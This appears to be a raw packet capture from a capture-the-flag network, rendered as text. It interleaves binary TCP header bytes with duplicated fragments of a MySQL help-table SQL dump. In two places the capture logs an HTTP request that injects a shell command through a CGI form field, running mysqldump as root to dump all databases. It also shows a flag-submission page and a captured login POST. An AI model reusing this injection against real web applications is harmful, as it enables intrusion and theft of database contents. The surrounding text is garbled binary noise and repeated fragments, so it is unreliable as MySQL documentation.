is\nless than or equal to max, BETWEEN returns 1,\notherwise it returns 0. This is equivalent to the expression\n(min <= expr AND expr <= max) if all the arguments are of the\nsame type. Otherwise type conversion takes place according to the rules\ndescribed at the beginning of this section, but applied to all the three\narguments. Note: Before MySQL\n4.0.5, arguments were converted to the type of expr instead.\n','mysql> SELECT 1 BETWEEN 2 AND 3;\n -> 0\nmysql> SELECT \'b\' BETWEEN \'a\' AND \'c\';\n -> 1\nmysql> SELECT 2 BETWEEN 2 AND \'3\';\n -> 1\nmysql> SELECT 2 BETWEEN 2 AND \'x-3\';\n -> 0',''),(111,'MULTIPOLYGON',2,' MultiPolygon(poly1,poly2,...)\nConstructs a WKB MultiPolygon value from a set of WKB Polygon\narguments.\nIf any argument is not a WKB Polygon, the return value is NULL.\n','',''),(112,'TIC ZZBi0`EL@/܂Sŀo0E4T@? 3 Ptjq"l{ )wC ZZBi0`EL@/܂Sŀo0E4b@?3 3 P]R^ )wC ZZ0`BiEL@/go0AE4T@@ 3 Ptjq"l{ )wC ZZ0`BiEL@/go0AE4b@@2 3 P]R^ )wC ZZBi0`EL@/܂Sŀo0E4T@? 3 Ptjy"ls )wC ZZ0`BiEL@/go0AE4T@@ 3 Ptjy"ls )wCT bbBi0`ET@/p܂Ao0E<6@?  3P˟ 2  *)iME_FORMAT',14,' TIME_FORMAT(time,format)\nThis is used like the DATE_FORMAT() function, but the\nformat string may contain only those format specifiers that handle\nhours, minutes, and seconds. Other specifiers produce a NULL value or\n0.\n','',''),(113,'LEFT',23,' LEFT(str,len)\nReturns the leftmost len characters from the string str.\n','mysql> SELECT LEFT(\'foobarbar\', 5);\n -> \'fooba\'',''),(114,'FLUSH QUERY CACHE',7,'You can defragment the query cache to better utilize its memory\nwith the FLUSH QUERY CACHE statement.\nThe statement does not remove any queries from the cache.\n\nThe RESET QUERY CACHE statement removes all query results from the\nquery cache. The FLUSH TABLES statement also does this.\n','',''),(115,'RAND',4,' RAND()\n RAND(N)\nReturns a random floating-point value in the range from 0 to 1.0.\nIf an integer argument N is specified, it is used as the seed value\n(producing a repeatable sequence).\n','mysql> SELECT RAND();\n -> 0.9233482386203\nmysql> SELECT RAND(20);\n -> 0.15888261251047\nmysql> SELECT RAND(20);\n -> 0.15888261251047\nmysql> SELECT RAND();\n -> 0.63553050033332\nmysql> SELECT RAND();\n -> 0.70100469486881',''),(116,'RPAD',23,' RPAD(str,len,padstr)\nReturns the string str, rigC[ ZZBi0`EL@/Ao0E4@?s  P?28R(p e_\C_ ""Bi0`E@/Sŀo0Ed@?2S 3 P]R )xGET /~museum/cgi-bin/museum_admin.pl?first=a&last=a%3B+mysqldump+-uroot+-pctftest+--all-databases&password=sad HTTP/1.0 User-Agent: Wget/1.10 Accept: */* Host: 10.12.1.3 Connection: Keep-Alive Co bb0`BiET@/Ԁo0SE<6@@  3P˟ 2  *)iME_FORMAT',14,' TIME_FORMAT(time,format)\nThis is used like the DATE_FORMAT() function, but the\nformat string may contain only those format specifiers that handle\nhours, minutes, and seconds. Other specifiers produce a NULL value or\n0.\n','',''),(113,'LEFT',23,' LEFT(str,len)\nReturns the leftmost len characters from the string str.\n','mysql> SELECT LEFT(\'foobarbar\', 5);\n -> \'fooba\'',''),(114,'FLUSH QUERY CACHE',7,'You can defragment the query cache to better utilize its memory\nwith the FLUSH QUERY CACHE statement.\nThe statement does not remove any queries from the cache.\n\nThe RESET QUERY CACHE statement removes all query results from the\nquery cache. The FLUSH TABLES statement also does this.\n','',''),(115,'RAND',4,' RAND()\n RAND(N)\nReturns a random floating-point value in the range from 0 to 1.0.\nIf an integer argument N is specified, it is used as the seed value\n(producing a repeatable sequence).\n','mysql> SELECT RAND();\n -> 0.9233482386203\nmysql> SELECT RAND(20);\n -> 0.15888261251047\nmysql> SELECT RAND(20);\n -> 0.15888261251047\nmysql> SELECT RAND();\n -> 0.63553050033332\nmysql> SELECT RAND();\n -> 0.70100469486881',''),(116,'RPAD',23,' RPAD(str,len,padstr)\nReturns the string str, rigCz ZZ0`BiEL@/!o0pE4@@r  P?28R(p e_\C ""0`BiE@/go0AEd@@1S 3 P]R )xGET /~museum/cgi-bin/museum_admin.pl?first=a&last=a%3B+mysqldump+-uroot+-pctftest+--all-databases&password=sad HTTP/1.0 User-Agent: Wget/1.10 Accept: */* Host: 10.12.1.3 Connection: Keep-Alive CN bbBi0`ET@/p܂Ao0E<6@?  3Pӟ   ,)iht-padded with the string padstr\nto a length of len characters. If str is longer\nthan len, the return value is shortened to len characters.\n','mysql> SELECT RPAD(\'hi\',5,\'?\');\n -> \'hi???\'\nmysql> SELECT RPAD(\'hi\',1,\'?\');\n -> \'h\'',''),(117,'INSERT INTO',6,'INSERT inserts new rows into an existing table. The INSERT ...\nVALUES and INSERT ... SET forms of the statement insert rows based\non explicitly specified values. The INSERT ... SELECT form inserts\nrows selected from another table or tables. The INSERT ... VALUES\nform with multiple value lists is supported in MySQL 3.22.5 or\nlater. The INSERT ... SET syntax is supported in MySQL\n3.22.10 or later.\nINSERT ... SELECT is discussed further in\nSee also : [INSERT SELECT, , INSERT SELECT].\n','INSERT [LOW_PRIORITY | DELAYED | HIGH_PRIORITY] [IGNORE]\n [INTO] tbl_name [(col_name,...)]\n VALUES ({expr | DEFAULT},...),(...),...\n [ ON DUPLICATE KEY UPDATE col_name=expr, ... ]',''),(118,'RESTORE',7,'\nRESTORE TABLE tbl_name [, tbl_name] ... FROM \'/path/to/backup/directory\'\n\nRestores the table or tables from a backup that was made with BACKUP\nTABLE. Existing tables are not overwritten; if you try to restore over\nan existing table, you get an error. Just as BACKUP TABLE,\nRCa bb0`BiET@/Ԁo0SE<6@@  3Pӟ   ,)iht-padded with the string padstr\nto a length of len characters. If str is longer\nthan len, the return value is shortened to len characters.\n','mysql> SELECT RPAD(\'hi\',5,\'?\');\n -> \'hi???\'\nmysql> SELECT RPAD(\'hi\',1,\'?\');\n -> \'h\'',''),(117,'INSERT INTO',6,'INSERT inserts new rows into an existing table. The INSERT ...\nVALUES and INSERT ... SET forms of the statement insert rows based\non explicitly specified values. The INSERT ... SELECT form inserts\nrows selected from another table or tables. The INSERT ... VALUES\nform with multiple value lists is supported in MySQL 3.22.5 or\nlater. The INSERT ... SET syntax is supported in MySQL\n3.22.10 or later.\nINSERT ... SELECT is discussed further in\nSee also : [INSERT SELECT, , INSERT SELECT].\n','INSERT [LOW_PRIORITY | DELAYED | HIGH_PRIORITY] [IGNORE]\n [INTO] tbl_name [(col_name,...)]\n VALUES ({expr | DEFAULT},...),(...),...\n [ ON DUPLICATE KEY UPDATE col_name=expr, ... ]',''),(118,'RESTORE',7,'\nRESTORE TABLE tbl_name [, tbl_name] ... FROM \'/path/to/backup/directory\'\n\nRestores the table or tables from a backup that was made with BACKUP\nTABLE. Existing tables are not overwritten; if you try to restore over\nan existing table, you get an error. Just as BACKUP TABLE,\nRCG ZZBi0`EL@/܂Sŀo0E4T@? 3 Ptj"lj )xCX ZZ0`BiEL@/go0AE4T@@ 3 Ptj"lj )xC ZZBi0`EL@/Ao0E4@?s  P?2=Z+* e`]C ZZ0`BiEL@/!o0pE4@@r  P?2=Z+* e`]C bbBi0`ET@/p܂Ao0E<6@?  3P۟   ,)iESTORE TABLE currently works only for MyISAM tables.\nThe directory should be specified as a full pathname.\n\nThe backup for each table consists of its *.frm format file and\n*.MYD data file. The restore operation restores those files, then\nuses them to rebuild the *.MYI index file. Restoring takes longer\nthan backing up due to the need to rebuild the indexes. The more indexes the\ntable has, the longer it takes.\n','',''),(119,'CREATE DATABASE',28,'CREATE DATABASE creates a database with the given name. To use\nCREATE DATABASE, you need the CREATE privilege on the database.\n','CREATE {DATABASE | SCHEMA} [IF NOT EXISTS] db_name\n [create_specification [, create_specification] ...]\n\ncreate_specification:\n [DEFAULT] CHARACTER SET charset_name\n | [DEFAULT] COLLATE collation_name',''),(120,'VAR_POP',12,' VAR_POP(expr)\nReturns the population standard variance of expr. It considers rows\nas the whole population, not as a sample, so it has the number of rows as\nthe denominator. This function was added in MySQL 5.0.3. Before 5.0.3, you\ncan use VARIANCE(), which is equivalent but not standard SQL.\n','',''),(121,'ELT',23,' ELT(N,str1,str2,str3,...)\nReturns str1 if N = 1, str2 if N =\n2, and so on. Returns NULL if N is less than 1\nor greater than tC ZZBi0`EL@/܂Sŀo0E4T@? 3 Ptj"lb )xC bb0`BiET@/Ԁo0SE<6@@  3P۟   ,)iESTORE TABLE currently works only for MyISAM tables.\nThe directory should be specified as a full pathname.\n\nThe backup for each table consists of its *.frm format file and\n*.MYD data file. The restore operation restores those files, then\nuses them to rebuild the *.MYI index file. Restoring takes longer\nthan backing up due to the need to rebuild the indexes. The more indexes the\ntable has, the longer it takes.\n','',''),(119,'CREATE DATABASE',28,'CREATE DATABASE creates a database with the given name. To use\nCREATE DATABASE, you need the CREATE privilege on the database.\n','CREATE {DATABASE | SCHEMA} [IF NOT EXISTS] db_name\n [create_specification [, create_specification] ...]\n\ncreate_specification:\n [DEFAULT] CHARACTER SET charset_name\n | [DEFAULT] COLLATE collation_name',''),(120,'VAR_POP',12,' VAR_POP(expr)\nReturns the population standard variance of expr. It considers rows\nas the whole population, not as a sample, so it has the number of rows as\nthe denominator. This function was added in MySQL 5.0.3. Before 5.0.3, you\ncan use VARIANCE(), which is equivalent but not standard SQL.\n','',''),(121,'ELT',23,' ELT(N,str1,str2,str3,...)\nReturns str1 if N = 1, str2 if N =\n2, and so on. Returns NULL if N is less than 1\nor greater than tC ZZ0`BiEL@/go0AE4T@@ 3 Ptj"lb )xC) ZZBi0`EL@/܂Sŀo0E4T@? 3 Ptj"lZ )xC: ZZ0`BiEL@/go0AE4T@@ 3 Ptj"lZ )xC bbBi0`ET@/p܂Ao0E<6@?  3P Y  1)jhe number of arguments. ELT() is the complement of\nFIELD().\n','mysql> SELECT ELT(1, \'ej\', \'Heja\', \'hej\', \'foo\');\n -> \'ej\'\nmysql> SELECT ELT(4, \'ej\', \'Heja\', \'hej\', \'foo\');\n -> \'foo\'',''),(122,'ALTER VIEW',24,'This statement changes the definition of an existing view.\nThe syntax is similar to that for CREATE VIEW.\nSee also : [CREATE VIEW, , CREATE VIEW].\nThis statement requires the CREATE VIEW and DELETE privileges\nfor the view, and some privilege for each column referred to in the\nSELECT statement.\n','ALTER [ALGORITHM = {UNDEFINED | MERGE | TEMPTABLE}]\n VIEW view_name [(column_list)]\n AS select_statement\n [WITH [CASCADED | LOCAL] CHECK OPTION]',''),(123,'~',27,' ~\nInvert all bits.\n','mysql> SELECT 5 & ~1;\n -> 4',''),(124,'CONCAT_WS',23,' CONCAT_WS(separator,str1,str2,...)\n\nCONCAT_WS() stands for CONCAT With Separator and is a special form of\nCONCAT(). The first argument is the separator for the rest of the\narguments.\nThe separator is added between the strings to be concatenated.\nThe separator can be a string as can the rest of the\narguments. If the separator is NULL, the result is NULL.\nThe function skips any NULL values after the\nseparator argument.\n','mysql> SELECT CONCAT_WS(\',\',\'C ZZBi0`EL@/Ao0E4@?s  P?2Gj+* ebbC bb0`BiET@/Ԁo0SE<6@@  3P Y  1)jhe number of arguments. ELT() is the complement of\nFIELD().\n','mysql> SELECT ELT(1, \'ej\', \'Heja\', \'hej\', \'foo\');\n -> \'ej\'\nmysql> SELECT ELT(4, \'ej\', \'Heja\', \'hej\', \'foo\');\n -> \'foo\'',''),(122,'ALTER VIEW',24,'This statement changes the definition of an existing view.\nThe syntax is similar to that for CREATE VIEW.\nSee also : [CREATE VIEW, , CREATE VIEW].\nThis statement requires the CREATE VIEW and DELETE privileges\nfor the view, and some privilege for each column referred to in the\nSELECT statement.\n','ALTER [ALGORITHM = {UNDEFINED | MERGE | TEMPTABLE}]\n VIEW view_name [(column_list)]\n AS select_statement\n [WITH [CASCADED | LOCAL] CHECK OPTION]',''),(123,'~',27,' ~\nInvert all bits.\n','mysql> SELECT 5 & ~1;\n -> 4',''),(124,'CONCAT_WS',23,' CONCAT_WS(separator,str1,str2,...)\n\nCONCAT_WS() stands for CONCAT With Separator and is a special form of\nCONCAT(). The first argument is the separator for the rest of the\narguments.\nThe separator is added between the strings to be concatenated.\nThe separator can be a string as can the rest of the\narguments. If the separator is NULL, the result is NULL.\nThe function skips any NULL values after the\nseparator argument.\n','mysql> SELECT CONCAT_WS(\',\',\'C+ ZZ0`BiEL@/!o0pE4@@r  P?2Gj+* ebbC ZZBi0`EL@/܂Sŀo0E4@?R 3 PZi:"lZ )y_C ZZBi0`EL@/܂Sŀo0E4T@? 3 Ptj"lQ )yC ZZ0`BiEL@/o0  E4@@Q 3 PZi:"lZ )y_C ZZ0`BiEL@/go0AE4T@@ 3 Ptj"lQ )yC bbBi0`ET@/p܂Ao0E<6@?  3P   1)jFirst name\',\'Second name\',\'Last Name\');\n -> \'First name,Second name,Last Name\'\nmysql> SELECT CONCAT_WS(\',\',\'First name\',NULL,\'Last Name\');\n -> \'First name,Last Name\'',''),(125,'ROW_COUNT',25,' ROW_COUNT()\n\nROW_COUNT() returns the number of rows updated, inserted, or deleted\nby the preceding statement. This is the same as the row count that the\nmysql client displays and the value from the\nmysql_affected_rows() C API function.\n','mysql> INSERT INTO t VALUES(1),(2),(3);\nQuery OK, 3 rows affected (0.00 sec)\nRecords: 3 Duplicates: 0 Warnings: 0\n\nmysql> SELECT ROW_COUNT();\n+-------------+\n| ROW_COUNT() |\n+-------------+\n| 3 |\n+-------------+\n1 row in set (0.00 sec)\n\nmysql> DELETE FROM t WHERE i IN(1,2);\nQuery OK, 2 rows affected (0.00 sec)\n\nmysql> SELECT ROW_COUNT();\n+-------------+\n| ROW_COUNT() |\n+-------------+\n| 2 |\n+-------------+\n1 row in set (0.00 sec)',''),(126,'ASIN',4,' ASIN(X)\nReturns the arc sine of X, that is, the value whose sine is\nX. Returns NULL if X is not in the range -1 to\n1.\n','mysql> SELECT ASIN(0.2);\n -> 0.201358\nmysql> SELECT ASIN(\'foo\');\n -> 0.000000',''),(127,'FUNCTION',22,'A user-defined function (UDF) is a way to extend MySQL with a new\nfC ZZBi0`EL@/܂Sŀo0E4T@? 3 Ptj"lI )yC ZZBi0`EL@/܂Sŀo0E4H@? 3 <P!p* )yyⵌC kkBiʪE]@/o0oo0EER@@ Pޮ%Μ1 7=y-^\HTTP/1.0 200 OK C bb0`BiET@/Ԁo0SE<6@@  3P   1)jFirst name\',\'Second name\',\'Last Name\');\n -> \'First name,Second name,Last Name\'\nmysql> SELECT CONCAT_WS(\',\',\'First name\',NULL,\'Last Name\');\n -> \'First name,Last Name\'',''),(125,'ROW_COUNT',25,' ROW_COUNT()\n\nROW_COUNT() returns the number of rows updated, inserted, or deleted\nby the preceding statement. This is the same as the row count that the\nmysql client displays and the value from the\nmysql_affected_rows() C API function.\n','mysql> INSERT INTO t VALUES(1),(2),(3);\nQuery OK, 3 rows affected (0.00 sec)\nRecords: 3 Duplicates: 0 Warnings: 0\n\nmysql> SELECT ROW_COUNT();\n+-------------+\n| ROW_COUNT() |\n+-------------+\n| 3 |\n+-------------+\n1 row in set (0.00 sec)\n\nmysql> DELETE FROM t WHERE i IN(1,2);\nQuery OK, 2 rows affected (0.00 sec)\n\nmysql> SELECT ROW_COUNT();\n+-------------+\n| ROW_COUNT() |\n+-------------+\n| 2 |\n+-------------+\n1 row in set (0.00 sec)',''),(126,'ASIN',4,' ASIN(X)\nReturns the arc sine of X, that is, the value whose sine is\nX. Returns NULL if X is not in the range -1 to\n1.\n','mysql> SELECT ASIN(0.2);\n -> 0.201358\nmysql> SELECT ASIN(\'foo\');\n -> 0.000000',''),(127,'FUNCTION',22,'A user-defined function (UDF) is a way to extend MySQL with a new\nfC ZZ0`BiEL@/go0AE4T@@ 3 Ptj"lI )yC! ZZ0`BiEL@/Eo0lE4H@@ 3 <P!p* )yyⵌC, kk0`BiE]@/Co0<EER@@ Pޮ%Μ1 7=y-^\HTTP/1.0 200 OK CV GGBiʪE9@/*o0oo0E!R@@6 Pޮ%Μ0 7=y.^\Content-Type: text/html CTF Flag Submission

Error submitting flag

The flag contains illegal characters. It cannot be a valid flag.


Try again, enter your flag here:

Ch GG0`BiE9@/ go0<E!R@@6 Pޮ%Μ0 7=y.^\Content-Type: text/html CTF Flag Submission

Error submitting flag

The flag contains illegal characters. It cannot be a valid flag.


Try again, enter your flag here:

CP bbBi0`ET@/p܂Ao0E<6@?  3P `Y  3)junction that works like a native (built-in) MySQL function such as\nABS() or CONCAT().\n\nfunction_name is the name that should be used in SQL statements to\ninvoke the function. The RETURNS clause indicates the type of the\nfunction\'s return value. shared_library_name is the basename of the\nshared object file that contains the code that implements the function. The\nfile must be located in a directory that is searched by your system\'s\ndynamic linker.\n\nTo create a function, you must have the INSERT and privilege for the\nmysql database. To drop a function, you must have the DELETE\nprivilege for the mysql database. This is because CREATE\nFUNCTION adds a row to the mysql.func system table that records the\nfunction\'s name, type, and shared library name, and DROP FUNCTION\ndeletes the function\'s row from that table. If you do not have this table,\nyou should run the mysql_fix_privilege_tables script to create it.\nSee also : [Upgrading-grant-tables].\n','CREATE [AGGREGATE] FUNCTION function_name RETURNS {STRING|INTEGER|REAL}\n SONAME shared_library_name\n\nDROP FUNCTION function_name',''),(128,'SIGN',4,' SIGN(X)\nReturns the sign of the argument as -1, 0, or 1, depending\non whether X is negative, zero, or positive.\n','mysql> SELECT SIGN(-32);\n CW ZZBi0`EL@/Ao0E4@?s  P?2Qz+* eeeC[ ZZBi0`EL@/܂Sŀo0E4T@? 3 Ptj"lA )yCk bb0`BiET@/Ԁo0SE<6@@  3P `Y  3)junction that works like a native (built-in) MySQL function such as\nABS() or CONCAT().\n\nfunction_name is the name that should be used in SQL statements to\ninvoke the function. The RETURNS clause indicates the type of the\nfunction\'s return value. shared_library_name is the basename of the\nshared object file that contains the code that implements the function. The\nfile must be located in a directory that is searched by your system\'s\ndynamic linker.\n\nTo create a function, you must have the INSERT and privilege for the\nmysql database. To drop a function, you must have the DELETE\nprivilege for the mysql database. This is because CREATE\nFUNCTION adds a row to the mysql.func system table that records the\nfunction\'s name, type, and shared library name, and DROP FUNCTION\ndeletes the function\'s row from that table. If you do not have this table,\nyou should run the mysql_fix_privilege_tables script to create it.\nSee also : [Upgrading-grant-tables].\n','CREATE [AGGREGATE] FUNCTION function_name RETURNS {STRING|INTEGER|REAL}\n SONAME shared_library_name\n\nDROP FUNCTION function_name',''),(128,'SIGN',4,' SIGN(X)\nReturns the sign of the argument as -1, 0, or 1, depending\non whether X is negative, zero, or positive.\n','mysql> SELECT SIGN(-32);\n Cv ZZ0`BiEL@/!o0pE4@@r  P?2Qz+* eeeC ZZ0`BiEL@/go0AE4T@@ 3 Ptj"lA )yCD ZZBi0`EL@/܂Sŀo0E4T@? 3 Ptj"l8 )zCU ZZ0`BiEL@/go0AE4T@@ 3 Ptj"l8 )zC bbBi0`ET@/p܂Ao0E<6@?  3P   3)j -> -1\nmysql> SELECT SIGN(0);\n -> 0\nmysql> SELECT SIGN(234);\n -> 1',''),(129,'SEC_TO_TIME',14,' SEC_TO_TIME(seconds)\nReturns the seconds argument, converted to hours, minutes, and seconds,\nas a value in \'HH:MM:SS\' or HHMMSS format, depending on whether\nthe function is used in a string or numeric context.\n','mysql> SELECT SEC_TO_TIME(2378);\n -> \'00:39:38\'\nmysql> SELECT SEC_TO_TIME(2378) + 0;\n -> 3938',''),(130,'YEAR TYPE',1,' YEAR[(2|4)]\n\nA year in two-digit or four-digit format. The default is four-digit format.\nIn four-digit format, the\nallowable values are 1901 to 2155, and 0000.\nIn two-digit format, the allowable values are\n70 to 69, representing years from\n1970 to 2069. MySQL displays YEAR values in\nYYYY format, but allows you to assign values to YEAR columns\nusing either strings or numbers. The YEAR type is unavailable prior\nto MySQL 3.22.\n','',''),(131,'FLOAT',1,' FLOAT(p) [UNSIGNED] [ZEROFILL]\n\nA floating-point number. p represents the precision. It can be from\n0 to 24 for a single-precision floating-point number and from 25 to 53 for a\ndouble-precision floating-point number. These types are like the FLOAT\nand DOUBLE types described immediately following. FLOAT(p)\nhas the same range as thC ZZBi0`EL@/"  o0E4S@?|  3PZ3KE  `)EC bb0`BiET@/Ԁo0SE<6@@  3P   3)j -> -1\nmysql> SELECT SIGN(0);\n -> 0\nmysql> SELECT SIGN(234);\n -> 1',''),(129,'SEC_TO_TIME',14,' SEC_TO_TIME(seconds)\nReturns the seconds argument, converted to hours, minutes, and seconds,\nas a value in \'HH:MM:SS\' or HHMMSS format, depending on whether\nthe function is used in a string or numeric context.\n','mysql> SELECT SEC_TO_TIME(2378);\n -> \'00:39:38\'\nmysql> SELECT SEC_TO_TIME(2378) + 0;\n -> 3938',''),(130,'YEAR TYPE',1,' YEAR[(2|4)]\n\nA year in two-digit or four-digit format. The default is four-digit format.\nIn four-digit format, the\nallowable values are 1901 to 2155, and 0000.\nIn two-digit format, the allowable values are\n70 to 69, representing years from\n1970 to 2069. MySQL displays YEAR values in\nYYYY format, but allows you to assign values to YEAR columns\nusing either strings or numbers. The YEAR type is unavailable prior\nto MySQL 3.22.\n','',''),(131,'FLOAT',1,' FLOAT(p) [UNSIGNED] [ZEROFILL]\n\nA floating-point number. p represents the precision. It can be from\n0 to 24 for a single-precision floating-point number and from 25 to 53 for a\ndouble-precision floating-point number. These types are like the FLOAT\nand DOUBLE types described immediately following. FLOAT(p)\nhas the same range as thC ZZ0`BiEL@/܀o0SE4S@@|  3PZ3KE  `)EC bbBi0`ET@/p܂Ao0E<6@?  3P   4)ke corresponding FLOAT and DOUBLE\ntypes, but the display width and number of decimals are undefined.\n\nAs of MySQL 3.23, this is a true floating-point value. In\nearlier MySQL versions, FLOAT(p) always has two decimals.\n\nThis syntax is provided for ODBC compatibility.\n\nUsing FLOAT might give you some unexpected problems because\nall calculations in MySQL are done with double precision.\nSee also : [No matching rows].\n\n FLOAT[(M,D)] [UNSIGNED] [ZEROFILL]\n\nA small (single-precision) floating-point number. Allowable values are\n-3.402823466E+38 to -1.175494351E-38, 0,\nand 1.175494351E-38 to 3.402823466E+38. If UNSIGNED is\nspecified, negative values are disallowed. M is the display width and\nD is the number of significant digits. FLOAT without arguments or\nFLOAT(p) (where p is in the range from 0 to 24) stands for a\nsingle-precision floating-point number.\n','',''),(132,'LOCATE',23,' LOCATE(substr,str)\n LOCATE(substr,str,pos)\n\nThe first syntax\nreturns the position of the first occurrence of substring substr\nin string str.\nThe second syntax\nreturns the position of the first occurrence of substring substr in\nstring str, starting at position pos.\nReturns 0 if substr is not in str.\n','',''),(133,'CHARSET',25,' CHARSET(str)\nReturns the charC ZZBi0`EL@/Ao0E4@?s  P?2[+* eghC. bb0`BiET@/Ԁo0SE<6@@  3P   4)ke corresponding FLOAT and DOUBLE\ntypes, but the display width and number of decimals are undefined.\n\nAs of MySQL 3.23, this is a true floating-point value. In\nearlier MySQL versions, FLOAT(p) always has two decimals.\n\nThis syntax is provided for ODBC compatibility.\n\nUsing FLOAT might give you some unexpected problems because\nall calculations in MySQL are done with double precision.\nSee also : [No matching rows].\n\n FLOAT[(M,D)] [UNSIGNED] [ZEROFILL]\n\nA small (single-precision) floating-point number. Allowable values are\n-3.402823466E+38 to -1.175494351E-38, 0,\nand 1.175494351E-38 to 3.402823466E+38. If UNSIGNED is\nspecified, negative values are disallowed. M is the display width and\nD is the number of significant digits. FLOAT without arguments or\nFLOAT(p) (where p is in the range from 0 to 24) stands for a\nsingle-precision floating-point number.\n','',''),(132,'LOCATE',23,' LOCATE(substr,str)\n LOCATE(substr,str,pos)\n\nThe first syntax\nreturns the position of the first occurrence of substring substr\nin string str.\nThe second syntax\nreturns the position of the first occurrence of substring substr in\nstring str, starting at position pos.\nReturns 0 if substr is not in str.\n','',''),(133,'CHARSET',25,' CHARSET(str)\nReturns the charC9 ZZ0`BiEL@/!o0pE4@@r  P?2[+* eghC ZZBi0`EL@/9do0E4@?/  P#`றBX Ġ ]<67=xgC' ZZʪBiEL@/o0o0oE4@@/  P#`றBX ŝ ]<67=xgC ZZBi0`EL@/܂Sŀo0E4T@? 3 Ptj"l0 )zC ZZBi0`EL@/܂Sŀo0E4T@? 3 Ptj"l' )zC ZZ0`BiEL@/go0AE4T@@ 3 Ptj"l0 )zC ZZ0`BiEL@/go0AE4T@@ 3 Ptj"l' )zC ZZBi0`EL@/܂Sŀo0E4H@? 3 <P!p# )zy⹌C ZZ0`BiEL@/Eo0lE4H@@ 3 <P!p# )zy⹌C BiʪEw@/o0oo0E_7@@ PBX#`d 7=y1]<6uname=kpRqcPiUie&pwd=miconsenta&action=readC 0`BiEw@/ o09dE_7@@  PBX#`c 7=y1]<6uname=kpRqcPiUie&pwd=miconsenta&action=readC bbBi0`ET@/p܂Ao0E<6@?  3P  ?  4)kacter set of the string argument.\n','mysql> SELECT CHARSET(\'abc\');\n -> \'latin1\'\nmysql> SELECT CHARSET(CONVERT(\'abc\' USING utf8));\n -> \'utf8\'\nmysql> SELECT CHARSET(USER());\n -> \'utf8\'',''),(134,'PURGE MASTER LOGS BEFORE TO',6,'PURGE {MASTER | BINARY} LOGS TO \'log_name\'\nPURGE {MASTER | BINARY} LOGS BEFORE \'date\'\n\nDeletes all the binary logs listed in the log\nindex that are strictly prior to the specified log or date.\nThe logs also are removed from the list recorded in the log index file,\nso that the given log becomes the first.\n','',''),(135,'SUBDATE',14,' SUBDATE(date,INTERVAL expr type)\n SUBDATE(expr,days)\n\nWhen invoked with the INTERVAL form of the second argument,\nSUBDATE() is a synonym for DATE_SUB().\nFor information on the INTERVAL argument, see the\ndiscussion for DATE_ADD().\n\nmysql> SELECT DATE_SUB(\'1998-01-02\', INTERVAL 31 DAY);\n -> \'1997-12-02\'\nmysql> SELECT SUBDATE(\'1998-01-02\', INTERVAL 31 DAY);\n -> \'1997-12-02\'\n\nAs of MySQL 4.1.1, the second syntax is allowed, where expr is a date\nor datetime expression and days is the number of days to be\nsubtracted from expr.\n\nmysql> SELECT SUBDATE(\'1998-01-02 12:00:00\', 31);\n -> \'1997-12-02 12:00:00\'\n\nNote that you canC bb0`BiET@/Ԁo0SE<6@@  3P  ?  4)kacter set of the string argument.\n','mysql> SELECT CHARSET(\'abc\');\n -> \'latin1\'\nmysql> SELECT CHARSET(CONVERT(\'abc\' USING utf8));\n -> \'utf8\'\nmysql> SELECT CHARSET(USER());\n -> \'utf8\'',''),(134,'PURGE MASTER LOGS BEFORE TO',6,'PURGE {MASTER | BINARY} LOGS TO \'log_name\'\nPURGE {MASTER | BINARY} LOGS BEFORE \'date\'\n\nDeletes all the binary logs listed in the log\nindex that are strictly prior to the specified log or date.\nThe logs also are removed from the list recorded in the log index file,\nso that the given log becomes the first.\n','',''),(135,'SUBDATE',14,' SUBDATE(date,INTERVAL expr type)\n SUBDATE(expr,days)\n\nWhen invoked with the INTERVAL form of the second argument,\nSUBDATE() is a synonym for DATE_SUB().\nFor information on the INTERVAL argument, see the\ndiscussion for DATE_ADD().\n\nmysql> SELECT DATE_SUB(\'1998-01-02\', INTERVAL 31 DAY);\n -> \'1997-12-02\'\nmysql> SELECT SUBDATE(\'1998-01-02\', INTERVAL 31 DAY);\n -> \'1997-12-02\'\n\nAs of MySQL 4.1.1, the second syntax is allowed, where expr is a date\nor datetime expression and days is the number of days to be\nsubtracted from expr.\n\nmysql> SELECT SUBDATE(\'1998-01-02 12:00:00\', 31);\n -> \'1997-12-02 12:00:00\'\n\nNote that you canC ZZBi0`EL@/Ao0E4@?s  P?2e+*v eiiC ZZ0`BiEL@/!o0pE4@@r  P?2e+*v eiiCQ bbBi0`ET@/p܂Ao0E<6@?  3P `,  =)l\'t use format \"%X%V\" to convert a year-week\nstring to date as a year-week doesn\'t uniquely identify a year-month if the\nweek crosses a month boundary. If you want to convert a year-week to a date\nyou can do it by also specifying the week day:\n\nmysql> select str_to_date(\'200442 Monday\', \'%X%V %W\');\n-> 2004-10-18\n','',''),(136,'DAYOFYEAR',14,' DAYOFYEAR(date)\nReturns the day of the year for date, in the range 1 to\n366.\n','mysql> SELECT DAYOFYEAR(\'1998-02-03\');\n -> 34',''),(137,'%',4,' MOD(N,M)\n N % M\n N MOD M\nModulo operation.\nReturns the remainder of N divided by M.\n','mysql> SELECT MOD(234, 10);\n -> 4\nmysql> SELECT 253 % 7;\n -> 1\nmysql> SELECT MOD(29,9);\n -> 2\nmysql> SELECT 29 MOD 9;\n -> 2',''),(138,'LONGTEXT',1,' LONGTEXT\n\nA TEXT column with a maximum length of 4,294,967,295 or\n4GB (2^32 - 1) characters. Up to MySQL\n3.23, the client/server protocol and MyISAM tables had a limit\nof 16MB per communication packet / table row. From MySQL 4.0, the maximum\nallowed length of LONGTEXT columns depends on the\nconfigured maximum packet size in the client/server protocol and available\nmemory.\n','',''),(139,'DISJOINT',11,' Disjoint(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 is spaC[ ZZBi0`EL@/u܂Io0E4:@?  PG^]/ e=Ct bb0`BiET@/Ԁo0SE<6@@  3P `,  =)l\'t use format \"%X%V\" to convert a year-week\nstring to date as a year-week doesn\'t uniquely identify a year-month if the\nweek crosses a month boundary. If you want to convert a year-week to a date\nyou can do it by also specifying the week day:\n\nmysql> select str_to_date(\'200442 Monday\', \'%X%V %W\');\n-> 2004-10-18\n','',''),(136,'DAYOFYEAR',14,' DAYOFYEAR(date)\nReturns the day of the year for date, in the range 1 to\n366.\n','mysql> SELECT DAYOFYEAR(\'1998-02-03\');\n -> 34',''),(137,'%',4,' MOD(N,M)\n N % M\n N MOD M\nModulo operation.\nReturns the remainder of N divided by M.\n','mysql> SELECT MOD(234, 10);\n -> 4\nmysql> SELECT 253 % 7;\n -> 1\nmysql> SELECT MOD(29,9);\n -> 2\nmysql> SELECT 29 MOD 9;\n -> 2',''),(138,'LONGTEXT',1,' LONGTEXT\n\nA TEXT column with a 